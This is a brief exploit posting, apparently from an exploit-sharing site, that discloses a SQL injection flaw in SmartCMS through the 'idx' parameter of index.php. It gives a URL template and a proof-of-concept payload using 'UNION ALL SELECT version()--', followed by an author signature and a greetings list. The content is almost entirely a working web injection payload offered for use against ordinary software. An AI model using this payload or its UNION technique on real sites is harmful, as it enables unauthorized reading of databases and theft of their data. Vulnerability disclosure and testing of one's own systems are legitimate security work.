1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
============================================================================================================= [o] SmartCMS <= SQL Injection Vulnerability Software : SmartMS Vendor : http://smartcms.nl/ Author : NoGe Contact: noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com/ ============================================================================================================= [o] Exploit http://localhost/[path]/index.php?idx=[SQLi] [o] PoC http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()-- ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] November 26 2012 - Papua, Indonesia |